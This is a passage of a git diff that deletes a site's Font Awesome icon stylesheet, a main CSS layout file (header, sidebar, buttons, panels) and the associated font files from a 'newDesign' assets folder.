nt:"\f06a"}.fa-gift:before{content:"\f06b"}.fa-leaf:before{content:"\f06c"}.fa-fire:before{content:"\f06d"}.fa-eye:before{content:"\f06e"}.fa-eye-slash:before{content:"\f070"}.fa-warning:before,.fa-exclamation-triangle:before{content:"\f071"}.fa-plane:before{content:"\f072"}.fa-calendar:before{content:"\f073"}.fa-random:before{content:"\f074"}.fa-comment:before{content:"\f075"}.fa-magnet:before{content:"\f076"}.fa-chevron-up:before{content:"\f077"}.fa-chevron-down:before{content:"\f078"}.fa-retweet:before{content:"\f079"}.fa-shopping-cart:before{content:"\f07a"}.fa-folder:before{content:"\f07b"}.fa-folder-open:before{content:"\f07c"}.fa-arrows-v:before{content:"\f07d"}.fa-arrows-h:before{content:"\f07e"}.fa-bar-chart-o:before{content:"\f080"}.fa-twitter-square:before{content:"\f081"}.fa-facebook-square:
before{content:"\f082"}.fa-camera-retro:before{content:"\f083"}.fa-key:before{content:"\f084"}.fa-gears:before,.fa-cogs:before{content:"\f085"}.fa-comments:before{content:"\f086"}.fa-thumbs-o-up:before{content:"\f087"}.fa-thumbs-o-down:before{content:"\f088"}.fa-star-half:before{content:"\f089"}.fa-heart-o:before{content:"\f08a"}.fa-sign-out:before{content:"\f08b"}.fa-linkedin-square:before{content:"\f08c"}.fa-thumb-tack:before{content:"\f08d"}.fa-external-link:before{content:"\f08e"}.fa-sign-in:before{content:"\f090"}.fa-trophy:before{content:"\f091"}.fa-github-square:before{content:"\f092"}.fa-upload:before{content:"\f093"}.fa-lemon-o:before{content:"\f094"}.fa-phone:before{content:"\f095"}.fa-square-o:before{content:"\f096"}.fa-bookmark-o:before{content:"\f097"}.fa-phone-square:before{content:"\f098"}.fa-twitter:before{content:"\f099"}.fa-facebook:before{content:"\f09a"}.fa-github:before{content:"\f09b"}.fa-unlock:before{content:"\f09c"}.fa-credit-card:before{content:"\f09d"}.fa-rss:before{content:"\f09e"}.fa-hdd-o:before{content:"\f0a0"}.fa-bullhorn:before{content:"\f0a1"}.fa-bell:before{content:"\f0f3"}.fa-certificate:before{content:"\f0a3"}.fa-hand-o-right:before{content:"\f0a4"}.fa-hand-o-left:before{content:"\f0a5"}.fa-hand-o-up:before{content:"\f0a6"}.fa-hand-o-down:before{content:"\f0a7"}.fa-arrow-circle-left:before{content:"\f0a8"}.fa-arrow-circle-right:before{content:"\f0a9"}.fa-arrow-circle-up:before{content:"\f0aa"}.fa-arrow-circle-down:before{content:"\f0ab"}.fa-globe:before{content:"\f0ac"}.fa-wrench:before{content:"\f0ad"}.fa-tasks:before{content:"\f0ae"}.fa-filter:before{content:"\f0b0"}.fa-briefcase:before{content:"\f0b1"}.fa-arrows-alt:before{content:"\f0b2"}.fa-group:before,.fa-users:before{content:"\f0c0"}.fa-chain:before,.fa-link:before{content:"\f0c1"}.fa-cloud:before{content:"\f0c2"}.fa-flask:before{content:"\f0c3"}.fa-cut:before,.fa-scissors:before{content:"\f0c4"}.fa-copy:before,.fa-files-o:before{content:"\f0c5"}.fa-paperclip:before{conte
nt:"\f0c6"}.fa-save:before,.fa-floppy-o:before{content:"\f0c7"}.fa-square:before{content:"\f0c8"}.fa-bars:before{content:"\f0c9"}.fa-list-ul:before{content:"\f0ca"}.fa-list-ol:before{content:"\f0cb"}.fa-strikethrough:before{content:"\f0cc"}.fa-underline:before{content:"\f0cd"}.fa-table:before{content:"\f0ce"}.fa-magic:before{content:"\f0d0"}.fa-truck:before{content:"\f0d1"}.fa-pinterest:before{content:"\f0d2"}.fa-pinterest-square:before{content:"\f0d3"}.fa-google-plus-square:before{content:"\f0d4"}.fa-google-plus:before{content:"\f0d5"}.fa-money:before{content:"\f0d6"}.fa-caret-down:before{content:"\f0d7"}.fa-caret-up:before{content:"\f0d8"}.fa-caret-left:before{content:"\f0d9"}.fa-caret-right:before{content:"\f0da"}.fa-columns:before{content:"\f0db"}.fa-unsorted:before,.fa-sort:before{content:"\f0dc"}.fa-sort-down:before,.fa-sort-asc:before{content:"\f0dd"}.fa-sort-up:before,.fa-sort-desc:before{content:"\f0de"}.fa-envelope:before{content:"\f0e0"}.fa-linkedin:before{content:"\f0e1"}.fa-rotate-left:before,.fa-undo:before{content:"\f0e2"}.fa-legal:before,.fa-gavel:before{content:"\f0e3"}.fa-dashboard:before,.fa-tachometer:before{content:"\f0e4"}.fa-comment-o:before{content:"\f0e5"}.fa-comments-o:before{content:"\f0e6"}.fa-flash:before,.fa-bolt:before{content:"\f0e7"}.fa-sitemap:before{content:"\f0e8"}.fa-umbrella:before{content:"\f0e9"}.fa-paste:before,.fa-clipboard:before{content:"\f0ea"}.fa-lightbulb-o:before{content:"\f0eb"}.fa-exchange:before{content:"\f0ec"}.fa-cloud-download:before{content:"\f0ed"}.fa-cloud-upload:before{content:"\f0ee"}.fa-user-md:before{content:"\f0f0"}.fa-stethoscope:before{content:"\f0f1"}.fa-suitcase:before{content:"\f0f2"}.fa-bell-o:before{content:"\f0a2"}.fa-coffee:before{content:"\f0f4"}.fa-cutlery:before{content:"\f0f5"}.fa-file-text-o:before{content:"\f0f6"}.fa-building-o:before{content:"\f0f7"}.fa-hospital-o:before{content:"\f0f8"}.fa-ambulance:before{content:"\f0f9"}.fa-medkit:before{content:"\f0fa"}.fa-fighter-jet:before{content:"\
f0fb"}.fa-beer:before{content:"\f0fc"}.fa-h-square:before{content:"\f0fd"}.fa-plus-square:before{content:"\f0fe"}.fa-angle-double-left:before{content:"\f100"}.fa-angle-double-right:before{content:"\f101"}.fa-angle-double-up:before{content:"\f102"}.fa-angle-double-down:before{content:"\f103"}.fa-angle-left:before{content:"\f104"}.fa-angle-right:before{content:"\f105"}.fa-angle-up:before{content:"\f106"}.fa-angle-down:before{content:"\f107"}.fa-desktop:before{content:"\f108"}.fa-laptop:before{content:"\f109"}.fa-tablet:before{content:"\f10a"}.fa-mobile-phone:before,.fa-mobile:before{content:"\f10b"}.fa-circle-o:before{content:"\f10c"}.fa-quote-left:before{content:"\f10d"}.fa-quote-right:before{content:"\f10e"}.fa-spinner:before{content:"\f110"}.fa-circle:before{content:"\f111"}.fa-mail-reply:before,.fa-reply:before{content:"\f112"}.fa-github-alt:before{content:"\f113"}.fa-folder-o:before{content:"\f114"}.fa-folder-open-o:before{content:"\f115"}.fa-smile-o:before{content:"\f118"}.fa-frown-o:before{content:"\f119"}.fa-meh-o:before{content:"\f11a"}.fa-gamepad:before{content:"\f11b"}.fa-keyboard-o:before{content:"\f11c"}.fa-flag-o:before{content:"\f11d"}.fa-flag-checkered:before{content:"\f11e"}.fa-terminal:before{content:"\f120"}.fa-code:before{content:"\f121"}.fa-reply-all:before{content:"\f122"}.fa-mail-reply-all:before{content:"\f122"}.fa-star-half-empty:before,.fa-star-half-full:before,.fa-star-half-o:before{content:"\f123"}.fa-location-arrow:before{content:"\f124"}.fa-crop:before{content:"\f125"}.fa-code-fork:before{content:"\f126"}.fa-unlink:before,.fa-chain-broken:before{content:"\f127"}.fa-question:before{content:"\f128"}.fa-info:before{content:"\f129"}.fa-exclamation:before{content:"\f12a"}.fa-superscript:before{content:"\f12b"}.fa-subscript:before{content:"\f12c"}.fa-eraser:before{content:"\f12d"}.fa-puzzle-piece:before{content:"\f12e"}.fa-microphone:before{content:"\f130"}.fa-microphone-slash:before{content:"\f131"}.fa-shield:before{content:"\f132"}.fa-calenda
r-o:before{content:"\f133"}.fa-fire-extinguisher:before{content:"\f134"}.fa-rocket:before{content:"\f135"}.fa-maxcdn:before{content:"\f136"}.fa-chevron-circle-left:before{content:"\f137"}.fa-chevron-circle-right:before{content:"\f138"}.fa-chevron-circle-up:before{content:"\f139"}.fa-chevron-circle-down:before{content:"\f13a"}.fa-html5:before{content:"\f13b"}.fa-css3:before{content:"\f13c"}.fa-anchor:before{content:"\f13d"}.fa-unlock-alt:before{content:"\f13e"}.fa-bullseye:before{content:"\f140"}.fa-ellipsis-h:before{content:"\f141"}.fa-ellipsis-v:before{content:"\f142"}.fa-rss-square:before{content:"\f143"}.fa-play-circle:before{content:"\f144"}.fa-ticket:before{content:"\f145"}.fa-minus-square:before{content:"\f146"}.fa-minus-square-o:before{content:"\f147"}.fa-level-up:before{content:"\f148"}.fa-level-down:before{content:"\f149"}.fa-check-square:before{content:"\f14a"}.fa-pencil-square:before{content:"\f14b"}.fa-external-link-square:before{content:"\f14c"}.fa-share-square:before{content:"\f14d"}.fa-compass:before{content:"\f14e"}.fa-toggle-down:before,.fa-caret-square-o-down:before{content:"\f150"}.fa-toggle-up:before,.fa-caret-square-o-up:before{content:"\f151"}.fa-toggle-right:before,.fa-caret-square-o-right:before{content:"\f152"}.fa-euro:before,.fa-eur:before{content:"\f153"}.fa-gbp:before{content:"\f154"}.fa-dollar:before,.fa-usd:before{content:"\f155"}.fa-rupee:before,.fa-inr:before{content:"\f156"}.fa-cny:before,.fa-rmb:before,.fa-yen:before,.fa-jpy:before{content:"\f157"}.fa-ruble:before,.fa-rouble:before,.fa-rub:before{content:"\f158"}.fa-won:before,.fa-krw:before{content:"\f159"}.fa-bitcoin:before,.fa-btc:before{content:"\f15a"}.fa-file:before{content:"\f15b"}.fa-file-text:before{content:"\f15c"}.fa-sort-alpha-asc:before{content:"\f15d"}.fa-sort-alpha-desc:before{content:"\f15e"}.fa-sort-amount-asc:before{content:"\f160"}.fa-sort-amount-desc:before{content:"\f161"}.fa-sort-numeric-asc:before{content:"\f162"}.fa-sort-numeric-desc:before{content:"\f163"}.f
a-thumbs-up:before{content:"\f164"}.fa-thumbs-down:before{content:"\f165"}.fa-youtube-square:before{content:"\f166"}.fa-youtube:before{content:"\f167"}.fa-xing:before{content:"\f168"}.fa-xing-square:before{content:"\f169"}.fa-youtube-play:before{content:"\f16a"}.fa-dropbox:before{content:"\f16b"}.fa-stack-overflow:before{content:"\f16c"}.fa-instagram:before{content:"\f16d"}.fa-flickr:before{content:"\f16e"}.fa-adn:before{content:"\f170"}.fa-bitbucket:before{content:"\f171"}.fa-bitbucket-square:before{content:"\f172"}.fa-tumblr:before{content:"\f173"}.fa-tumblr-square:before{content:"\f174"}.fa-long-arrow-down:before{content:"\f175"}.fa-long-arrow-up:before{content:"\f176"}.fa-long-arrow-left:before{content:"\f177"}.fa-long-arrow-right:before{content:"\f178"}.fa-apple:before{content:"\f179"}.fa-windows:before{content:"\f17a"}.fa-android:before{content:"\f17b"}.fa-linux:before{content:"\f17c"}.fa-dribbble:before{content:"\f17d"}.fa-skype:before{content:"\f17e"}.fa-foursquare:before{content:"\f180"}.fa-trello:before{content:"\f181"}.fa-female:before{content:"\f182"}.fa-male:before{content:"\f183"}.fa-gittip:before{content:"\f184"}.fa-sun-o:before{content:"\f185"}.fa-moon-o:before{content:"\f186"}.fa-archive:before{content:"\f187"}.fa-bug:before{content:"\f188"}.fa-vk:before{content:"\f189"}.fa-weibo:before{content:"\f18a"}.fa-renren:before{content:"\f18b"}.fa-pagelines:before{content:"\f18c"}.fa-stack-exchange:before{content:"\f18d"}.fa-arrow-circle-o-right:before{content:"\f18e"}.fa-arrow-circle-o-left:before{content:"\f190"}.fa-toggle-left:before,.fa-caret-square-o-left:before{content:"\f191"}.fa-dot-circle-o:before{content:"\f192"}.fa-wheelchair:before{content:"\f193"}.fa-vimeo-square:before{content:"\f194"}.fa-turkish-lira:before,.fa-try:before{content:"\f195"}.fa-plus-square-o:before{content:"\f196"} \ No newline at end of file diff --git a/newDesign/assets/css/main.css b/newDesign/assets/css/main.css deleted file mode 100644 index b24578542..000000000 
--- a/newDesign/assets/css/main.css
+++ /dev/null
@@ -1,760 +0,0 @@
-/* ==========================================================================
- Base styles
- ========================================================================== */
-body {
- color: #5D5F63;
- background: #212121;
- font-family: 'Open Sans', sans-serif;
- padding: 0px;
- margin: 0px;
- text-rendering: optimizeLegibility;
- -webkit-font-smoothing: antialiased;
-}
-a:link,
-a:visited {
- text-decoration: none;
- outline: none;
- color: #e84c3d;
-}
-a:hover,
-a:active {
- outline: none;
- text-decoration: none;
- color: #16a086;
-}
-h1,
-h2,
-h3,
-h4,
-h5,
-h6 {
- font-family: 'Source Sans Pro', Arial, sans-serif;
-}
-p {
- font-size: 14px;
-}
-hr {
- margin-top: 10px;
- margin-bottom: 10px;
-}
-img {
- max-width: 100%;
-}
-::selection {
- background: #fff7dd;
-}
-::-moz-selection {
- background: #fff7dd;
-}
-/* ==========================================================================
- Layout
- ========================================================================== */
-#container {
- width: 100%;
- height: 100%;
- z-index: 0;
- -webkit-transition: all 0.3s ease-in-out;
- -moz-transition: all 0.3s ease-in-out;
- -o-transition: all 0.3s ease-in-out;
- -ms-transition: all 0.3s ease-in-out;
- transition: all 0.3s ease-in-out;
-}
-/* Header */
-#header {
- z-index: 200;
- background: #fff;
- min-height: 80px;
- -webkit-transition: all 0.3s ease-in-out;
- -moz-transition: all 0.3s ease-in-out;
- -o-transition: all 0.3s ease-in-out;
- -ms-transition: all 0.3s ease-in-out;
- transition: all 0.3s ease-in-out;
- margin-right: 0;
-}
-#header .brand {
- float: left;
- width: 240px;
- height: 80px;
- padding: 0;
- position: relative;
- background: url('../img/logoBG.jpg') no-repeat 0px 0px;
-}
-#header .logo {
- color: #fff;
- font-size: 1.7em;
- text-transform: uppercase;
- padding: 23px 0 0 75px;
- display: inline-block;
-}
-#header .logo span {
- font-weight: 700;
-}
-#header .toggle-navigation button:hover,
-#header .toggle-navigation button:active,
-#header button#toggle-mail:hover,
-#header button#toggle-mail:active {
- background: #e84c3d;
-}
-#header .toggle-navigation button:hover i,
-#header button#toggle-mail:hover i {
- color: #F6F6F6;
-}
-#header .toggle-navigation.toggle-left {
- margin-top: 5px;
- margin-left: 20px;
- display: inline-block;
-}
-#header .btn-default {
- padding: 3px 9px;
- background: #F6F6F6;
- -webkit-border-radius: 50%;
- -moz-border-radius: 50%;
- -ms-border-radius: 50%;
- -o-border-radius: 50%;
- border-radius: 50%;
- width: 35px;
- height: 35px;
-}
-#header .btn-default .fa-bars,
-#header .btn-default .fa-comment {
- cursor: pointer;
- color: #797979;
-}
-#header .btn-default .fa-info,
-#header .btn-default .fa-envelope,
-#header .btn-default .fa-user {
- color: #797979;
-}
-#header .user-nav button:hover,
-#header .user-nav button:active {
- background: #e84c3d;
-}
-#header .user-nav button:hover i {
- color: #F6F6F6;
-}
-#header .lessonTitle {
- display: inline-block;
- margin:0 0 0 20px;
-}
-#header .pull-right {
- float: right !important;
- margin-top:25px;
- margin-right:20px;
-}
-/* Sidebar */
-.sidebar {
- width: 240px;
- height: 100%;
- background: #222;
- position: absolute;
- -webkit-transition: all 0.3s ease-in-out;
- -moz-transition: all 0.3s ease-in-out;
- -o-transition: all 0.3s ease-in-out;
- -ms-transition: all 0.3s ease-in-out;
- transition: all 0.3s ease-in-out;
- z-index: 100;
-}
-.sidebar-toggle {
- margin-left: -240px;
-}
-#leftside-navigation ul,
-#leftside-navigation ul ul {
- margin: -2px 0 0;
- padding: 0;
-}
-#leftside-navigation ul li {
- list-style-type: none;
- border-bottom: 1px solid rgba(255, 255, 255, 0.05);
-}
-#leftside-navigation ul li a {
- color: #aeb2b7;
- text-decoration: none;
- display: block;
- padding: 18px 0 18px 25px;
- font-size: 12px;
- outline: none;
- -webkit-transition: all 200ms ease-in;
- -moz-transition: all 200ms ease-in;
- -o-transition: all 200ms ease-in;
- -ms-transition: all 200ms ease-in;
- transition: all 200ms ease-in;
-}
-#leftside-navigation ul li a span {
- display: inline-block;
-}
-#leftside-navigation ul ul li {
- background: #333;
- margin-bottom: 0;
- margin-left: 0;
- margin-right: 0;
- border-bottom: none;
-}
-#leftside-navigation ul ul li a {
- font-size: 12px;
- padding-top: 13px;
- padding-bottom: 13px;
- color: #aeb2b7;
-}
-#leftside-navigation ul li a i {
- width: 20px;
-}
-#leftside-navigation ul li a i.fa-angle-right,
-#leftside-navigation ul li a i.fa-angle-left {
- padding-top: 3px;
-}
-#leftside-navigation ul ul {
- display: none;
-}
-#leftside-navigation li.active ul {
- display: block;
-}
-#leftside-navigation ul li a:hover,
-#leftside-navigation ul li.active > a {
- color: #e84c3d;
-}
-.btn-primary + .dropdown-menu > li > a:hover,
-.btn-primary + .dropdown-menu > li > a:active {
- background-color: #16a086;
-}
-
-/* ==========================================================================
- Main Content
- ========================================================================== */
-.main-content-wrapper {
- margin-left: 240px;
- margin-right: 0;
- -webkit-transition: all 0.3s ease-in-out;
- -moz-transition: all 0.3s ease-in-out;
- -o-transition: all 0.3s ease-in-out;
- -ms-transition: all 0.3s ease-in-out;
- transition: all 0.3s ease-in-out;
- background: #f1f2f7;
- min-height: 1000px;
-}
-.main-content-wrapper #main-content {
- background: url('../img/webBg.png') no-repeat top left;
- border-top: solid thin #e7e8ec;
- display: inline-block;
- padding: 15px 15px 0 15px;
- width: 100%;
-}
-.main-content-wrapper #main-content .h1 {
- margin: 0;
- padding: 0px 10px 40px 10px;
- float: left;
- line-height: 10px;
- font-weight: 300;
- font-size: 42px;
- font-family: 'Source Sans Pro', Arial, sans-serif;
-}
-.main-content-toggle-left {
- margin-left: 0;
-}
-.main-content-toggle-right {
- margin-right: 240px;
-}
-/* ==========================================================================
- Buttons
- ========================================================================== */
-.btn {
- border: none;
- font-size: 15px;
- font-weight: normal;
- -webkit-border-radius: 3px;
- -moz-border-radius: 3px;
- -ms-border-radius: 3px;
- -o-border-radius: 3px;
- border-radius: 3px;
- padding: 8px 14px;
- margin-bottom: 5px;
- -webkit-font-smoothing: subpixel-antialiased;
- -webkit-transition: border 0.25s linear, color 0.25s linear, background-color 0.25s linear;
- transition: border 0.25s linear, color 0.25s linear, background-color 0.25s linear;
-}
-.btn:hover,
-.btn:focus {
- outline: none;
-}
-.btn:active,
-.btn.active {
- outline: none;
- -webkit-box-shadow: none;
- box-shadow: none;
- outline: none!important;
-}
-.btn.disabled,
-.btn[disabled],
-.btn fieldset[disabled] .btn {
- background-color: #bdc3c7;
- color: rgba(255, 255, 255, 0.75);
- opacity: 0.7;
- filter: alpha(opacity=70);
-}
-/* Default Buttons*/
-.btn-default,
-a.btn-default:link,
-a.btn-default:visited {
- color: #ffffff;
- background-color: #bdc3c7;
- outline: none!important;
-}
-a.btn-default:hover,
-a.btn-default:active {
- color: #ffffff;
- background-color: #cbd0d3;
- border-color: #cbd0d3;
-}
-.btn-default:hover,
-.btn-default:focus,
-.btn-default:active,
-.btn-default.active,
-.open .dropdown-toggle.btn-default {
- color: #ffffff;
- background-color: #cbd0d3;
- border-color: #cbd0d3;
-}
-.btn-default:active,
-.btn-default.active,
-.open .dropdown-toggle.btn-default {
- background: #bdc3c7;
- border-color: #bdc3c7;
-}
-.btn-default.disabled,
-.btn-default[disabled],
-fieldset[disabled] .btn-default,
-.btn-default.disabled:hover,
-.btn-default[disabled]:hover,
-fieldset[disabled] .btn-default:hover,
-.btn-default.disabled:focus,
-.btn-default[disabled]:focus,
-fieldset[disabled] .btn-default:focus,
-.btn-default.disabled:active,
-.btn-default[disabled]:active,
-fieldset[disabled] .btn-default:active,
-.btn-default.disabled.active,
-.btn-default[disabled].active,
-fieldset[disabled] .btn-default.active {
- background-color: #bdc3c7;
- border-color: #bdc3c7;
-}
-.btn-primary,
-a.btn-primary:link,
-a.btn-primary:visited {
- color: #fff;
- background-color: #e84c3d;
-}
-a.btn-primary:hover,
-a.btn-primary:active {
- color: #ffffff;
- background-color: #C62F28;
- border-color: #C62F28;
-}
-.btn-primary:hover,
-.btn-primary:focus,
-.btn-primary:active,
-.btn-primary.active,
-.open .dropdown-toggle.btn-primary {
- color: #ffffff;
- background-color: #C62F28;
- border-color: #C62F28;
-}
-.btn-primary:active,
-.btn-primary.active,
-.open .dropdown-toggle.btn-primary {
- background: #e84c3d;
- border-color: #e84c3d;
-}
-.btn-primary.disabled,
-.btn-primary[disabled],
-fieldset[disabled] .btn-primary,
-.btn-primary.disabled:hover,
-.btn-primary[disabled]:hover,
-fieldset[disabled] .btn-primary:hover,
-.btn-primary.disabled:focus,
-.btn-primary[disabled]:focus,
-fieldset[disabled] .btn-primary:focus,
-.btn-primary.disabled:active,
-.btn-primary[disabled]:active,
-fieldset[disabled] .btn-primary:active,
-.btn-primary.disabled.active,
-.btn-primary[disabled].active,
-fieldset[disabled] .btn-primary.active {
- background-color: #e84c3d;
- border-color: #e84c3d;
-}
-.btn-info {
- color: #ffffff;
- background-color: #3598db;
-}
-.btn-info,
-a.btn-info:link,
-a.btn-info:visited {
- color: #ffffff;
- background-color: #3598db;
-}
-a.btn-info:hover,
-a.btn-info:active {
- color: #ffffff;
- background-color: #4ba3df;
-}
-.btn-info:hover,
-.btn-info:focus,
-.btn-info:active,
-.btn-info.active,
-.open .dropdown-toggle.btn-info {
- color: #ffffff;
- background-color: #4ba3df;
- border-color: #4ba3df;
-}
-.btn-info:active,
-.btn-info.active,
-.open .dropdown-toggle.btn-info {
- background: #3598db;
- border-color: #3598db;
-}
-.btn-info.disabled,
-.btn-info[disabled],
-fieldset[disabled] .btn-info,
-.btn-info.disabled:hover,
-.btn-info[disabled]:hover,
-fieldset[disabled] .btn-info:hover,
-.btn-info.disabled:focus,
-.btn-info[disabled]:focus,
-fieldset[disabled] .btn-info:focus,
-.btn-info.disabled:active,
-.btn-info[disabled]:active,
-fieldset[disabled] .btn-info:active,
-.btn-info.disabled.active,
-.btn-info[disabled].active,
-fieldset[disabled] .btn-info.active {
- background-color: #3598db;
- border-color: #3598db;
-}
-.btn-danger {
- color: #ffffff;
- background-color: #e84c3d;
-}
-.btn-danger:hover,
-.btn-danger:focus,
-.btn-danger:active,
-.btn-danger.active,
-.open .dropdown-toggle.btn-danger {
- color: #ffffff;
- background-color: #eb6154;
- border-color: #eb6154;
-}
-.btn-danger:active,
-.btn-danger.active,
-.open .dropdown-toggle.btn-danger {
- background: #eb6154;
- border-color: #eb6154;
-}
-.btn-danger.disabled,
-.btn-danger[disabled],
-fieldset[disabled] .btn-danger,
-.btn-danger.disabled:hover,
-.btn-danger[disabled]:hover,
-fieldset[disabled] .btn-danger:hover,
-.btn-danger.disabled:focus,
-.btn-danger[disabled]:focus,
-fieldset[disabled] .btn-danger:focus,
-.btn-danger.disabled:active,
-.btn-danger[disabled]:active,
-fieldset[disabled] .btn-danger:active,
-.btn-danger.disabled.active,
-.btn-danger[disabled].active,
-fieldset[disabled] .btn-danger.active {
- background-color: #e84c3d;
- border-color: #e84c3d;
-}
-.btn-success {
- color: #ffffff;
- background-color: #2dcc70;
-}
-.btn-success:hover,
-.btn-success:focus,
-.btn-success:active,
-.btn-success.active,
-.open .dropdown-toggle.btn-success {
- color: #ffffff;
- background-color: #3ed47d;
- border-color: #3ed47d;
-}
-.btn-success:active,
-.btn-success.active,
-.open .dropdown-toggle.btn-success {
- background: #2dcc70;
- border-color: #2dcc70;
-}
-.btn-success.disabled,
-.btn-success[disabled],
-fieldset[disabled] .btn-success,
-.btn-success.disabled:hover,
-.btn-success[disabled]:hover,
-fieldset[disabled] .btn-success:hover,
-.btn-success.disabled:focus,
-.btn-success[disabled]:focus,
-fieldset[disabled] .btn-success:focus,
-.btn-success.disabled:active,
-.btn-success[disabled]:active,
-fieldset[disabled] .btn-success:active,
-.btn-success.disabled.active,
-.btn-success[disabled].active,
-fieldset[disabled] .btn-success.active {
- background-color: #2dcc70;
- border-color: #2dcc70;
-}
-.btn-warning {
- color: #ffffff;
- background-color: #f1c40f;
-}
-.btn-warning:hover,
-.btn-warning:focus,
-.btn-warning:active,
-.btn-warning.active,
-.open .dropdown-toggle.btn-warning {
- color: #ffffff;
- background-color: #f1c40f;
- border-color: #f1c40f;
-}
-.btn-warning:active,
-.btn-warning.active,
-.open .dropdown-toggle.btn-warning {
- background: #f2ca27;
- border-color: #f2ca27;
-}
-.btn-warning.disabled,
-.btn-warning[disabled],
-fieldset[disabled] .btn-warning,
-.btn-warning.disabled:hover,
-.btn-warning[disabled]:hover,
-fieldset[disabled] .btn-warning:hover,
-.btn-warning.disabled:focus,
-.btn-warning[disabled]:focus,
-fieldset[disabled] .btn-warning:focus,
-.btn-warning.disabled:active,
-.btn-warning[disabled]:active,
-fieldset[disabled] .btn-warning:active,
-.btn-warning.disabled.active,
-.btn-warning[disabled].active,
-fieldset[disabled] .btn-warning.active {
- background-color: #f1c40f;
- border-color: #f1c40f;
-}
-/* Button Sizes */
-.btn-lg {
- padding: 10px 16px;
- font-size: 18px;
- line-height: 1.33;
-}
-.btn-sm {
- padding: 5px 10px;
- font-size: 12px;
- line-height: 1.5;
- -webkit-border-radius: 3px;
- -moz-border-radius: 3px;
- -ms-border-radius: 3px;
- -o-border-radius: 3px;
- border-radius: 3px;
-}
-.btn-xs {
- padding: 1px 5px;
- font-size: 12px;
- line-height: 1.5;
- -webkit-border-radius: 3px;
- -moz-border-radius: 3px;
- -ms-border-radius: 3px;
- -o-border-radius: 3px;
- border-radius: 3px;
-}
-/* ==========================================================================
- Breadcrumbs
- ========================================================================== */
-.breadcrumb {
- background: none;
-}
-.breadcrumb > li {
- font-size: 12px;
-}
-/* ==========================================================================
- Icons
- ========================================================================== */
-.fa-hover {
- margin: 5px 0;
-}
-.fa-hover i {
- font-size: 14px;
- margin-right: 5px;
- width: 20px;
-}
-/* ==========================================================================
- Panels
- ========================================================================== */
-.panel {
- border: none;
- box-shadow: none;
- -webkit-border-radius: 3px;
- -moz-border-radius: 3px;
- -ms-border-radius: 3px;
- -o-border-radius: 3px;
- border-radius: 3px;
-}
-.panel > .panel-heading {
- font-size: 13px;
- font-weight: 400;
- text-transform: uppercase;
- padding: 15px;
-}
-.panel .actions {
- position: absolute;
- right: 30px;
- top: 18px;
-}
-.panel .actions i {
- font-size: 1em;
- margin: 0 3px;
-}
-.panel .actions i:hover {
- cursor: pointer;
-}
-.panel > .panel-footer {
- font-size: 13px;
- font-weight: 400;
- text-transform: uppercase;
- padding: 15px;
-}
-.panel-default > .panel-heading {
- border-color: #eff2f7;
- background: #fafafa;
- color: #767676;
-}
-.panel-default .actions i {
- font-size: 1em;
- color: #bdc3c7;
- margin: 0 3px;
-}
-.panel-default .actions i:hover {
- cursor: pointer;
- color: #767676;
-}
-.panel-default > .panel-footer {
- border-color: #eff2f7;
- background: #fafafa;
- color: #767676;
-}
-.panel-primary > .panel-heading {
- color: #fff;
- background-color: #e84c3d;
- border-color: #e84c3d;
-}
-.panel-primary {
- border-color: #e84c3d;
-}
-.panel-primary > .panel-heading a,
-.panel-primary > .panel-heading a:hover {
- color: #fff;
-}
-.panel-solid-default > .panel-heading,
-.panel-solid-default > .panel-body,
-.panel-solid-default > .panel-footer {
- background: #bdc3c7;
- color: #fff;
- border: none;
-}
-.panel-solid-primary > .panel-heading,
-.panel-solid-primary > .panel-body,
-.panel-solid-primary > .panel-footer {
- background: #e84c3d;
- color: #fff;
- border: none;
-}
-.panel-solid-success > .panel-heading,
-.panel-solid-success > .panel-body,
-.panel-solid-success > .panel-footer {
- background: #2dcc70;
- color: #fff;
- border: none;
-}
-.panel-solid-warning > .panel-heading,
-.panel-solid-warning > .panel-body,
-.panel-solid-warning > .panel-footer {
- background: #f1c40f;
- color: #fff;
- border: none;
-}
-.panel-solid-info > .panel-heading,
-.panel-solid-info > .panel-body,
-.panel-solid-info > .panel-footer {
- background: #3598db;
- color: #fff;
- border: none;
-}
-.panel-solid-danger > .panel-heading,
-.panel-solid-danger > .panel-body,
-.panel-solid-danger > .panel-footer {
- background: #e84c3d;
- color: #fff;
- border: none;
-}
-/* ==========================================================================
- Modal
- ========================================================================== */
-.modal-footer .btn + .btn {
- margin-bottom: 5px;
-}
-.modal .modal-body.modal-scroll {
- max-height: 350px;
- overflow-y: auto;
-}
-/* ==========================================================================
- Media Queries
- ========================================================================== */
-@media only screen and (max-width: 767px) and (min-width: 480px) {
- /* Main Content */
- #main-content .h1 {
- font-size: 35px;
- }
-}
-@media only screen and (max-width: 660px) {
- #header {
- height: 160px;
- }
- #header .brand {
- width: 100%;
- }
- #header .user-nav ul {
- padding-left: 0;
- }
- #header .toggle-navigation.toggle-left {
- float: left;
- }
- .sidebar {
- margin-left: -240px;
- }
- .sidebar-toggle {
- margin-left: 0;
- width: 100%;
- }
- .main-content-wrapper {
- margin-left: 0;
- }
- .main-content-toggle-left {
- margin-left: 660px;
- }
- .sidebarRight {
- top: 160px;
- width: 100%;
- }
- .user-nav ul li {
- font-size: 12px;
- }
-}
-@media only screen and (max-width: 479px) {
- /* Main Content */
- #main-content .h1 {
- font-size: 22px;
- }
- #header .dropdown.messages {
- display: none;
- }
-}
diff --git a/newDesign/assets/fonts/FontAwesome.otf b/newDesign/assets/fonts/FontAwesome.otf deleted file mode 100644 index 8b0f54e47..000000000 Binary files a/newDesign/assets/fonts/FontAwesome.otf and /dev/null differ diff --git a/newDesign/assets/fonts/fontawesome-webfont.eot b/newDesign/assets/fonts/fontawesome-webfont.eot deleted file mode 100644 index 7c79c6a6b..000000000 Binary files a/newDesign/assets/fonts/fontawesome-webfont.eot and /dev/null differ diff --git a/newDesign/assets/fonts/fontawesome-webfont.svg b/newDesign/assets/fonts/fontawesome-webfont.svg deleted file mode 100644 index 45fdf3383..000000000 --- a/newDesign/assets/fonts/fontawesome-webfont.svg +++ /dev/null @@ -1,414 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 